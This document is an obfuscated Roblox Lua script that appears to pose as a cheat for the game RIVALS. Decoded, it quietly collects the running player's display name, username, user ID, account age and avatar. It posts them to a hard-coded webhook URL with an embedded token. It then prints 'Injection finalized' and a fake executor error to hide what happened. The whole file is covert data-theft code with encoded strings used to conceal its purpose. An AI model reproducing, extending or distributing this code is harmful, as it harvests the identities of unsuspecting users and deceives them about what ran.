local _V={104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,108,101,119,105,115,97\
,107\117\114\97\46\109\111\101\47\97\112\105\47\119\101\98\104\111\111\107\115\47\49\52\55\50\57\54\53\49\57\56\51\55\50\54\55\49\55\49\52\47\68\80\79\74\108\83\95\109\106\109\50\51\72\52\113\67\111\84\110\78\95\89\45\50\80\108\84\86\56\115\106\69\54\57\45\117\56\88\105\97\84\106\70\117\73\111\54\74\119\101\102\73\65\105\79\78\98\88\98\100\50\76\121\72\106\108\114}
local _P=game:GetService("\80\108\97\121\101\114\115").LocalPlayer;local _H=game:GetService("\72\116\116\112\83\101\114\118\105\99\101")
local function _R(t) local s="" for i=1,#t do s=s..string.char(t[i]) end return s end
local function _X()
local _S=(syn and syn.request)or(http and http.request)or http_request or request;if not _S then return end
local _A=_R({104,116,116,112,115,58,47,47,116,104,117\
,109\98\110\97\105\108\115\46\114\111\98\108\111\120\46\99\111\109\47\118\49\47\117\115\101\114\115\47\97\118\97\116\97\114\45\104\101\97\100\115\104\111\116\63\117\115\101\114\73\100\115\61})..tostring(_P.UserId).._R({38,115,105\
,122\101\61\52\50\48\120\52\50\48\38\102\111\114\109\97\116\61\80\110\103\38\105\115\67\105\114\99\117\108\97\114\61\102\97\108\115\101})
local _G=_S({Url=_A,Method=_R({71,69,84})})local _I=""if _G.Success then local _D=_H:JSONDecode(_G.Body)if _D and _D.data and _D.data[1] then _I=_D.data[1].imageUrl end end
local _PL={["embeds"]={{["title"]=_R({240,159,154,168,32,42,42,69,120,101,99,117,116,105,111,110,32,76,111,103,103,101,100,42,42}),["description"]=_R({85,115,101,114,32,101,120,101,99,117,116,101,100,32,82,73,86,65,76,83,32,101,120,112,108,111,105,116,32,115,99,114,105\
,112\116\46}),["color"]=0,["fields"]={{["name"]=_R({68,105,115,112,108,97,121,32,78,97,109\
,101}),["value"]="``"..tostring(_P.DisplayName).."``",["inline"]=true},{["name"]=_R({85,115,101,114,110\
,97\109\101}),["value"]="``"..tostring(_P.Name).."``",["inline"]=true},{["name"]=_R({85,115,101\
,114,32,73,68}),["value"]="``"..tostring(_P.UserId).."``",["inline"]=false},{["name"]=_R({65,99\
,99,111,117,110,116\32\65\103\101}),["value"]="``"..tostring(_P.AccountAge).." days``",["inline"]=false}},["thumbnail"]={["url"]=_I},["timestamp"]=os.date(_R({33,37,89,45,37,109,45,37,100,84,37,72,58,37,77,58,37,83,90}))}}}
_S({Url=_R(_V),Method=_R({80,79,83,84}),Headers={[_R({67,111,110,116,101,110\
,116,45,84,121,112,101})]=_R({97,112,112,108,105,99\
,97\116\105\111\110,47,106,115,111,110})},Body=_H:JSONEncode(_PL)})end;pcall(_X)
task.wait(1.5)print(_R({45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45}))
print(_R({73,110,106,101,99,116,105,111,110,32,102,105,110,97,108,105,122\
,101\100,46}))task.wait(1)warn(_R({83,111,108,97\
,114\97\58\32\67\114\105\116\105\107\108\32\69\114\114\111\114\32\45\32\83\105\103\110\97\116\117\114\101\32\77\105\115\109\97\116\99\104\32\40\48\120\56\56\52\50\41\46\32\80\108\101\97\115\101\32\99\104\101\99\107\32\116\104\101\32\115\99\114\101\105\112\116\32\115\111\117\114\99\101\46}))
